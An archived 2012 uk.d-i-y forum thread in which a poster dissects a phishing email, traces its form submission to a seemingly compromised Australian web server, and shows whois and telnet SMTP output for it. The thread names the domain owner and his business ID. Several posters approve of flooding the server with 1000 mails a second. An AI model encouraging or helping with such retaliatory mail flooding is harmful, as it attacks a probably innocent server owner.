Home |
Search |
Today's Posts |
|
UK diy (uk.d-i-y) For the discussion of all topics related to diy (do-it-yourself) in the UK. All levels of experience and proficency are welcome to join in to ask questions or offer solutions. |
Reply |
|
LinkBack | Thread Tools | Display Modes |
|
#1
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
I got a phishing email today.
Told me to click on the HTML and sort out my bank. A bit of inspection of teh attached code showed that it wanted me using a direct copy of my banks login page, to submit my details to a machine in Australia. Registered address was a Richard someone or other. Armed with the IP address of said spammers machine, I managed to ascertain it was running a mail system. Better still,. it accepted mail to 'root@localhost' (most machines will). He has mail.. I do have under development on a centrally located server with gigabytes of bandwidth a mail client that will send mail to any IP address directly..the thought of flooding his mailbox with 1000 mails a second appeals.. OTOH I may just register the IP address with spamhaus :-( |
#2
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
On Feb 23, 2:00 pm, The Natural Philosopher
wrote: I got a phishing email today. Told me to click on the HTML and sort out my bank. A bit of inspection of teh attached code showed that it wanted me using a direct copy of my banks login page, to submit my details to a machine in Australia. Registered address was a Richard someone or other. Armed with the IP address of said spammers machine, I managed to ascertain it was running a mail system. Better still,. it accepted mail to 'root@localhost' (most machines will). He has mail.. I do have under development on a centrally located server with gigabytes of bandwidth a mail client that will send mail to any IP address directly..the thought of flooding his mailbox with 1000 mails a second appeals.. OTOH I may just register the IP address with spamhaus :-( was poor Richard directly responsible or had his domain been hacked by miscreants? Jim K |
#3
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
On Feb 23, 2:13*pm, Jim K wrote:
was poor Richard directly responsible or had his domain been hacked by miscreants? Jim K If "poor Richard" has been hacked receipt of 1000 mails a second might make him more careful with his system security in future. |
#4
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
On Feb 23, 3:01*pm, 82045 wrote:
On Feb 23, 2:13*pm, Jim K wrote: was poor Richard directly responsible or had his domain been hacked by miscreants? Jim K If "poor Richard" has been hacked receipt of 1000 mails a second might make him more careful with his system security in future. More likely poor Richard doesnt have a clue what's going on, and will simply have to abandon the email addy altogether. NT |
#5
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
NT wrote:
On Feb 23, 3:01 pm, 82045 wrote: On Feb 23, 2:13 pm, Jim K wrote: was poor Richard directly responsible or had his domain been hacked by miscreants? Jim K If "poor Richard" has been hacked receipt of 1000 mails a second might make him more careful with his system security in future. More likely poor Richard doesnt have a clue what's going on, and will simply have to abandon the email addy altogether. Dear boy it was not an 'email addy' it was a physical linux machine. And it was where, if I had been stupid enough to fall for the scam, the supplied form would have sent my bank account details and password. Now Richard may be entirely innocent, but if he is his machine is running a lot of code he doesn't know about including a whole webserver and set of PHP scripts. NT |
#6
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
On 23/02/2012 15:53, NT wrote:
More likely poor Richard doesnt have a clue what's going on, and will simply have to abandon the email addy altogether. You may call him Richard, we'll just call him Dick. Andy |
#7
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
On Feb 23, 8:46 pm, Andy Champ wrote:
On 23/02/2012 15:53, NT wrote: More likely poor Richard doesnt have a clue what's going on, and will simply have to abandon the email addy altogether. You may call him Richard, we'll just call him Dick. Andy or Dick Unwittington perchance? Jim K |
#8
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
Tim Streater wrote:
In article , NT wrote: On Feb 23, 3:01 pm, 82045 wrote: On Feb 23, 2:13 pm, Jim K wrote: was poor Richard directly responsible or had his domain been hacked by miscreants? If "poor Richard" has been hacked receipt of 1000 mails a second might make him more careful with his system security in future. More likely poor Richard doesnt have a clue what's going on, and will simply have to abandon the email addy altogether. The OP said that Richard was running a mail server. He was running a web server to gather phished data. In which case if he set that up, he should know better. If he didn't, and he's just a bot, then 1000 mails a second should fill his disk up PDQ and the machine will fall over. Look it seems that people don't actually understand this scam. A letter arrives. It appears to come from - lets say - One giveaway is it isn't addressed directly to you, by name. It tells you to click on the attached html form and fill it out. This form takes 99% of your own banks website, but with one crucial difference, Instead of submitting the form to your bank, it submits it to the phishing web server.. I didn't try doing that to see what would happen. eg in it is this line form name="form1" action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post" At that point whatever you keyed in is now available to the phisher. Anyway, I identified that server, and discovered it would accept emails. #whois drabcdfirstaid.com.au Domain Name: drabcdfirstaid.com.au Last Modified: 30-Aug-2011 10:55:39 UTC Registrar ID: NetRegistry Registrar Name: NetRegistry Status: ok Registrant: LLOYD, RICHARD MILES Eligibility Type: Sole Trader Eligibility ID: ABN 35521483210 ...... so #telnet www.drabcdfirstaid.com.au 25 Trying 64.251.30.196... Connected to drabcdfirstaid.com.au. Escape character is '^]'. 220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu) tells me its a ubuntu machine running postfix mail. Now I know that if I carry on with this telnet into the SMTP port, its very likely that root@localhost will be accepted as a direct recipient into the root users mailbox. So I sent one. And it was. The email came via an oregon ISP. From a completely different source entirely. Now its possible looking at the above that poor old richard doesn't know he has a nasty file stuffed in a hidden directory (.image) on his web server. OTOH I did not do anything nasty. He knows he's been violated at one level or another so if he doesn't get down and check his server out, and see lots of unusual access, he's a first grade dope anyway. |
#9
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
The Natural Philosopher :
Tim Streater wrote: In article oups.com, NT wrote: On Feb 23, 3:01 pm, 82045 wrote: On Feb 23, 2:13 pm, Jim K wrote: was poor Richard directly responsible or had his domain been hacked by miscreants? If "poor Richard" has been hacked receipt of 1000 mails a second might make him more careful with his system security in future. More likely poor Richard doesnt have a clue what's going on, and will simply have to abandon the email addy altogether. The OP said that Richard was running a mail server. He was running a web server to gather phished data. In which case if he set that up, he should know better. If he didn't, and he's just a bot, then 1000 mails a second should fill his disk up PDQ and the machine will fall over. Look it seems that people don't actually understand this scam. A letter arrives. It appears to come from - lets say - customer- One giveaway is it isn't addressed directly to you, by name. It tells you to click on the attached html form and fill it out. Do I understand you correctly, that some e-mail clients will accept an HTML form and enable you to complete and submit it without it being displayed in your browser? That sounds scary. I ask because my mail client won't do anything like that, I'm sure. -- Mike Barnes |
#10
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
"The Natural Philosopher" wrote in message ... snip so #telnet www.drabcdfirstaid.com.au 25 Trying 64.251.30.196... Connected to drabcdfirstaid.com.au. Escape character is '^]'. 220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu) tells me its a ubuntu machine running postfix mail. Now I know that if I carry on with this telnet into the SMTP port, its very likely that root@localhost will be accepted as a direct recipient into the root users mailbox. So I sent one. And it was. snip This tells me that you aren't in the habit of typing in SMTP at the keyboard, or you could have confirmed the acceptance of the 'root@localhost' address whilst connected to the server via Telnet. Then again, I'd have to refresh my memory of the RFCs before attempting it now :-) Ah - rereading it may well be that you did as I suggested instead of sending a seperate email. For those wondering if it was a mail address, a web server, whatever, a standard server install of Ubuntu can give you the whole nine yards in one go. Posibly the person who set up the system was focussed on installing the web server and hadn't realised he/she/it had also set up a working mail server by default. Then again all the incoming mail may be redirected to '/dev/null'. Cheers Dave R -- No plan survives contact with the enemy. [Not even bunny] Helmuth von Moltke the Elder (\__/) (='.'=) (")_(") |
#11
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
82045 wrote:
On Feb 23, 2:13 pm, Jim K wrote: was poor Richard directly responsible or had his domain been hacked by miscreants? Jim K If "poor Richard" has been hacked receipt of 1000 mails a second might make him more careful with his system security in future. Precisely do. |
#12
Posted to uk.d-i-y
|
|||
|
|||
Idle fun for net hackers..
Jim K wrote:
On Feb 23, 2:00 pm, The Natural Philosopher wrote: I got a phishing email today. Told me to click on the HTML and sort out my bank. A bit of inspection of teh attached code showed that it wanted me using a direct copy of my banks login page, to submit my details to a machine in Australia. Registered address was a Richard someone or other. Armed with the IP address of said spammers machine, I managed to ascertain it was running a mail system. Better still,. it accepted mail to 'root@localhost' (most machines will). He has mail.. I do have under development on a centrally located server with gigabytes of bandwidth a mail client that will send mail to any IP address directly..the thought of flooding his mailbox with 1000 mails a second appeals.. OTOH I may just register the IP address with spamhaus :-( was poor Richard directly responsible or had his domain been hacked by miscreants? well that's up to him to sort out. But the machine looked pretty tight to me. Jim K |
Reply |
Thread Tools | Search this Thread |
Display Modes | |
|
|
Similar Threads | ||||
Thread | Forum | |||
Will the hackers win? | Home Repair | |||
Hackers steal electronic data | Metalworking | |||
Hackers steal electronic data | Metalworking | |||
Chinese hackers steal code for Joint Strike Fighter and more | Metalworking | |||
EBAY HACKERS | Home Repair |